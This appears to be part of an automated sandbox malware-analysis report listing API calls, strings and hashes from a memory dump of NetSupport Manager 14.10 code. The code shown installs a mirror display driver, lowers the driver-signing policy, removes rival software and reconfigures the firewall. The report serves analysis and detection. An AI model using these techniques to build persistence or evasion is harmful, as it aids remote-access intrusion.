                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterEnvironmentExpandSectionStrings
                                                                                                                        • String ID: ..\CTL32\Config.cpp$@$_present$buflen >= sizeof (TCHAR)
                                                                                                                        • API String ID: 1631139872-3711079296
                                                                                                                        • Opcode ID: 2a37453cfd1b0d3ffc59b9279fa675bc0f2a19638770ae704f819dc7775a243e
                                                                                                                        • Instruction ID: 351042ff93c3a9a6ca1642eaac7bf5ca27d95eb6443b34f062ae5174d7d8755e
                                                                                                                        • Opcode Fuzzy Hash: 2a37453cfd1b0d3ffc59b9279fa675bc0f2a19638770ae704f819dc7775a243e
                                                                                                                        • Instruction Fuzzy Hash: 4EB1D47190425A9BCB34DF65DC89BEEB3B5FF54310F144699E8099B290EB70AE80CBD0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __localtime64__time64
                                                                                                                        • String ID: ?$EVAL$IsA()$authcode$currentver$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$expiredver$expiryday$expirymonth$expiryyear$startday$startmonth$startyear
                                                                                                                        • API String ID: 3099643277-4160200971
                                                                                                                        • Opcode ID: 92cd3c3610e50c02fe53af6dfb11ca5cc33e0acc49affbd5ada467daee2a0811
                                                                                                                        • Instruction ID: 218d2460c1a68485d07db05d2f48969c7b41ef6dd4315971cd7f4d586d35b089
                                                                                                                        • Opcode Fuzzy Hash: 92cd3c3610e50c02fe53af6dfb11ca5cc33e0acc49affbd5ada467daee2a0811
                                                                                                                        • Instruction Fuzzy Hash: B6B1AE71D002099AEB10EBE4C982BEEBBF5EF68714F5045D8E911772C1EB75AE04CB61
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,HARDWARE\DeviceMap\Video,00000000,00020019,?), ref: 00B228C0
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,\Device\Video0,00000000,?,?,?), ref: 00B228FB
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B22912
                                                                                                                        • _wcschr.LIBCMT ref: 00B22927
                                                                                                                        • _wcschr.LIBCMT ref: 00B22939
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,?,?), ref: 00B22A0A
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,InstalledDisplayDrivers,?,?,?,00000200), ref: 00B22A4E
                                                                                                                        • RegSetValueExW.ADVAPI32(?,InstalledDisplayDrivers,00000000,00000007,?,?), ref: 00B22A68
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B22A96
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B22AE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseValue$OpenQuery_wcschr
                                                                                                                        • String ID: HARDWARE\DeviceMap\Video$InstalledDisplayDrivers$\ControlSet$\Device\Video0$gfff
                                                                                                                        • API String ID: 2837386005-2659084398
                                                                                                                        • Opcode ID: f10ec2a3636b211a37689f55135ca2c8801034c1e1a978b96f31ce51d2ea552e
                                                                                                                        • Instruction ID: a381a635202a4606da64f0d7bf185fdd5143325f55836963ca5a2cca1eebc357
                                                                                                                        • Opcode Fuzzy Hash: f10ec2a3636b211a37689f55135ca2c8801034c1e1a978b96f31ce51d2ea552e
                                                                                                                        • Instruction Fuzzy Hash: C8619472E00229ABDB20DF54EC89FEB73B9EB94310F1441E9F50DD7251EA745E848B91
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                        • _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B137C0: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?), ref: 00B137E0
                                                                                                                        • _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • _memset.LIBCMT ref: 00B194CA
                                                                                                                          • Part of subcall function 00B3B767: __isdigit_l.LIBCMT ref: 00B3B78C
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B19528
                                                                                                                          • Part of subcall function 00B38406: __fassign.LIBCMT ref: 00B383E3
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00B19593
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseOpenQueryValueVersion__fassign__isdigit_l__wcsnicmp_wcsncpy
                                                                                                                        • String ID: ($CSDVersion$CurrentBuild$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Deletewsprintf
                                                                                                                        • String ID: DisplayName$InstallUninstall$NSM$NetSupport Manager for Windows (32 bit) V14.10$Software\Microsoft\Windows\CurrentVersion\Uninstall\%s$UninstallString$winstall /U /P%s
                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 00AF8267
                                                                                                                        • _memset.LIBCMT ref: 00AF8278
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 00AF82E0
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF8309
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00AF8314
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF8329
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleObjectProcessSingleSleepWait_memsetwsprintf
                                                                                                                        • String ID: *** Use ICFConfig2 ***$CreateProcess() failed: $D$WScript.exe icfconfig.vbs %s "%s" "%s"$disable$enable$remove
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF0CD
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF145
                                                                                                                        • GetTempFileNameW.KERNEL32(?,00B6D714,00000000,?), ref: 00AFF158
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00AFF16E
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000005), ref: 00AFF1A3
                                                                                                                        • wsprintfW.USER32 ref: 00AFF436
                                                                                                                        Strings
                                                                                                                        • Unloadable mirror detected - update on reboot, xrefs: 00AFF12C
                                                                                                                        • gdihook5 (e2=%d), xrefs: 00AFF430
                                                                                                                        • Try again after removing the 'Block Unsigned Driver Policy', xrefs: 00AFF472
                                                                                                                        • \gdihook5.dll, xrefs: 00AFF0F1
                                                                                                                        • mirror already installed, xrefs: 00AFF105
                                                                                                                        • InstallGdihook5 ret %d, xrefs: 00AFF496
                                                                                                                        • rename %s to %s on reboot ok, xrefs: 00AFF1BB
                                                                                                                        • gdihook5.dll, xrefs: 00AFF0B8
                                                                                                                        • copy %s to %s ok, xrefs: 00AFF186
                                                                                                                        Similarity
                                                                                                                        • API ID: File$DirectorySystem$CopyMoveNameTempwsprintf
                                                                                                                        • String ID: Try again after removing the 'Block Unsigned Driver Policy'$InstallGdihook5 ret %d$Unloadable mirror detected - update on reboot$\gdihook5.dll$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$mirror already installed$rename %s to %s on reboot ok
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00B1C2AD
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B1C2BF
                                                                                                                          • Part of subcall function 00B19840: LoadLibraryW.KERNEL32(gdi32.dll), ref: 00B19855
                                                                                                                          • Part of subcall function 00B19840: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 00B19867
                                                                                                                          • Part of subcall function 00B19840: FreeLibrary.KERNEL32(00000000), ref: 00B1987E
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B1C2CF
                                                                                                                          • Part of subcall function 00B19710: _memset.LIBCMT ref: 00B19755
                                                                                                                          • Part of subcall function 00B19710: GetVersionExW.KERNEL32(?), ref: 00B1976E
                                                                                                                          • Part of subcall function 00B19710: LoadLibraryW.KERNEL32(kernel32.dll), ref: 00B19795
                                                                                                                          • Part of subcall function 00B19710: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00B197A7
                                                                                                                          • Part of subcall function 00B19710: FreeLibrary.KERNEL32(00000000), ref: 00B197BF
                                                                                                                          • Part of subcall function 00B19710: GetSystemDefaultLangID.KERNEL32 ref: 00B197CA
                                                                                                                        • LoadBitmapW.USER32(00000000,?), ref: 00B1C2F9
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00B1C309
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1C323
                                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00B1C33B
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B1C346
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00CC0020), ref: 00B1C384
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1C395
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B1C39C
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B1C3A5
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B1C3A8
                                                                                                                        • ReleaseDC.USER32(?,?), ref: 00B1C3B2
                                                                                                                        • DeleteObject.GDI32(00FF00FF), ref: 00B1C3E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B1C3EA
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$DeleteLibrarySelect$CompatibleCreateLoad$AddressBitmapFreeProc$DefaultLangReleaseSystemVersion_memset
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumValue
                                                                                                                        • String ID: "$%s doesnt exist$%s exists$%s=%s, err=%d$Del %s, err=%d$Found %s$\%s
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,5E06C67B), ref: 00AF868E
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 00AF86B1
                                                                                                                        • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 00AF86D4
                                                                                                                        • GetLastError.KERNEL32 ref: 00AF86D8
                                                                                                                        • _malloc.LIBCMT ref: 00AF86F3
                                                                                                                        • QueryServiceConfigW.ADVAPI32(?,00000000,?,?), ref: 00AF8707
                                                                                                                        • _wcschr.LIBCMT ref: 00AF8717
                                                                                                                        • GetLastError.KERNEL32 ref: 00AF87EB
                                                                                                                          • Part of subcall function 00AF4110: std::_Lockit::_Lockit.LIBCPMT ref: 00AF41C4
                                                                                                                        • _free.LIBCMT ref: 00AF8815
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00AF8821
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00AF882E
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseConfigErrorHandleLastOpenQuery$LockitLockit::_Manager_free_malloc_wcschrstd::_
                                                                                                                        • String ID: /$QueryServiceConfig() failed! $ServicesActive
                                                                                                                        APIs
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 00B1C104
                                                                                                                        • GetObjectW.GDI32(00000000,0000005C,?), ref: 00B1C116
                                                                                                                        • _memset.LIBCMT ref: 00B1C127
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B1C175
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00B1C208
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 00B1C23C
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00B1C254
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateFontIndirectStock$__wcsicoll_memset
                                                                                                                        • String ID: ..\CTL32\util.cpp$IsA()$MS Shell Dlg$Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$hFont$hSubstitutedFont
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(USER32), ref: 00AFE5F9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 00AFE61B
                                                                                                                        • _memset.LIBCMT ref: 00AFE635
                                                                                                                        • EnumDisplaySettingsW.USER32(00000000,000000FF,?), ref: 00AFE654
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AFE65F
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressDisplayEnumFreeLoadProcSettings_memset
                                                                                                                        • String ID: EnumDisplayDevicesW$USER32$gdihook5$pci gdihook5
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(PCIImage.dll), ref: 00B09390
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CompressBitmapToJPEGEx), ref: 00B093AB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CompressBitmapToPNG), ref: 00B093B5
                                                                                                                        • timeGetTime.WINMM ref: 00B093D5
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00B093F6
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeLoadTimetime
                                                                                                                        • String ID: CompressBitmapToJPEGEx$CompressBitmapToPNG$PCIImage.dll
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • LoadLibraryW.KERNEL32(newdev.dll), ref: 00AFE3EA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesW), ref: 00AFE403
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00AFE360,00000000,00000000,?), ref: 00AFE426
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AFE431
                                                                                                                        Strings
                                                                                                                        • UpdateGdihook5 end, xrefs: 00AFE498
                                                                                                                        • UpdateDriverForPlugAndPlayDevicesW, xrefs: 00AFE3FD
                                                                                                                        • Returned from UpdateDriverForPlugAndPlayDevices, xrefs: 00AFE484
                                                                                                                        • UpdateGdihook5, xrefs: 00AFE3D6
                                                                                                                        • UpdateDriverForPlugAndPlayDevices returned error %d, xrefs: 00AFE477
                                                                                                                        • newdev.dll, xrefs: 00AFE3E5
                                                                                                                        • About to call UpdateDriverForPlugAndPlayDevices, xrefs: 00AFE447
                                                                                                                        Similarity
                                                                                                                        • API ID: Librarywsprintf$AddressCreateFreeLoadLocalProcThreadTime_mallocwvsprintf
                                                                                                                        • String ID: About to call UpdateDriverForPlugAndPlayDevices$Returned from UpdateDriverForPlugAndPlayDevices$UpdateDriverForPlugAndPlayDevices returned error %d$UpdateDriverForPlugAndPlayDevicesW$UpdateGdihook5$UpdateGdihook5 end$newdev.dll
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(NSMMain,00000000), ref: 00B2428F
                                                                                                                        • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00B242AB
                                                                                                                        • IsWindow.USER32(00000000), ref: 00B242B2
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00B242BA
                                                                                                                        • IsWindow.USER32(00000000), ref: 00B242BD
                                                                                                                        • FindWindowW.USER32(NSMMain,00000000), ref: 00B242CA
                                                                                                                        • FindWindowW.USER32(CICWClass,00000000), ref: 00B242F3
                                                                                                                        • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00B24300
                                                                                                                        • FindWindowW.USER32(NSMWControl32,00000000), ref: 00B2430D
                                                                                                                        • PostMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00B2431C
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Find$MessagePost$Sleep
                                                                                                                        • String ID: CICWClass$NSMMain$NSMWClass$NSMWControl32
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B28832
                                                                                                                          • Part of subcall function 00B00E40: _malloc.LIBCMT ref: 00B00E5C
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 00B288C9
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                          • Part of subcall function 00B01DC0: _free.LIBCMT ref: 00B01DED
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadOpenString_free_mallocwsprintfwvsprintf
                                                                                                                        • String ID: /S$"%s%s" /* %s%s$%s=%s, e=%d$C:\Windows\Installer\$ImagePath$IsA()$SYSTEM\CurrentControlSet\Services\%s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Library$Free$Load_memset
                                                                                                                        • String ID: setupapi.dll
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00AE4A70
                                                                                                                        • wsprintfW.USER32 ref: 00AE4A83
                                                                                                                          • Part of subcall function 00B04990: RegOpenKeyExW.ADVAPI32(?,?,00000000,?), ref: 00B049AC
                                                                                                                          • Part of subcall function 00B049E0: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,?), ref: 00B04A0B
                                                                                                                        • _malloc.LIBCMT ref: 00AE4B0C
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                          • Part of subcall function 00B045B0: RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00AE47BC,00000000,00000000), ref: 00B045F5
                                                                                                                        • _free.LIBCMT ref: 00AE4BD4
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000001,?), ref: 00AE4C2C
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE4C8F
                                                                                                                        • RegSetValueExW.ADVAPI32(?,nssCurrConfig,00000000,00000001,?,?,?,?,0002001F,00000000,00000000,80000001,?,00020019), ref: 00AE4CD4
                                                                                                                        Similarity
                                                                                                                        • API ID: Valuewsprintf$AllocateCreateDeleteEnumHeapOpen__wcsicoll_free_malloc
                                                                                                                        • String ID: %s\ConfigList\%s$@$CurrConfig$IsA()$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$nssCurrConfig
                                                                                                                        APIs
                                                                                                                        • _wcschr.LIBCMT ref: 00B2E1F3
                                                                                                                        • _wcschr.LIBCMT ref: 00B2E216
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000100,00B8CB80), ref: 00B2E682
                                                                                                                        • PostMessageW.USER32(?,000003E1,?,00000000), ref: 00B2EDE1
                                                                                                                        • DestroyWindow.USER32(?), ref: 00B2EDEE
                                                                                                                        • _fputs.LIBCMT ref: 00B2EE3D
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00B2EE58
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$CurrentDestroyDirectoryMessagePostSleepWindow_fputs
                                                                                                                        • String ID: Created main window %08x$Done:$Exit$OK$Restart$winexec.ok
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00B2AF0A
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,UninstallString,00000000,?,?,?), ref: 00B2AF5D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00B2AF68
                                                                                                                        • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 00B2B07D
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        • _memset.LIBCMT ref: 00B2AFAD
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B2AFE2
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B2B01C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2B02F
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B2B038
                                                                                                                        • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00B2B04D
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$HandleOpenwsprintfwvsprintf$CreateDeleteLoadLocalObjectProcessQuerySingleStringTimeValueWait_malloc_memset
                                                                                                                        • String ID: D$NukeRival : %s$UninstallString
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Driver Signing,00000000,000F003F,?), ref: 00AFEB4F
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?), ref: 00AFEB77
                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000004,?,00000004,?,Policy,00000000,?,?,?), ref: 00AFEBA4
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Driver Signing,00000000,000F003F,?), ref: 00AFEBE1
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?), ref: 00AFEC0D
                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000003,?), ref: 00AFEC3C
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00AFEC76
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$OpenQuery$Sleep
                                                                                                                        • String ID: Policy$Software\Microsoft\Driver Signing$cupol %d$cupol err, e=%d$lmpol %d$lmpol err, e=%d
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\DeviceClasses,00000000,0002001F,?), ref: 00AFB1F1
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB218
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFB224
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB22E
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Enum,00000000,0002001F,?), ref: 00AFB24B
                                                                                                                        • _wprintf.LIBCMT ref: 00AFB26C
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00AFB278
                                                                                                                          • Part of subcall function 00AFB0E0: RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 00AFB10B
                                                                                                                          • Part of subcall function 00AFB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00AFB14B
                                                                                                                          • Part of subcall function 00AFB0E0: RegEnumKeyExW.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,?), ref: 00AFB196
                                                                                                                          • Part of subcall function 00AFB0E0: RegCloseKey.ADVAPI32(?), ref: 00AFB1A3
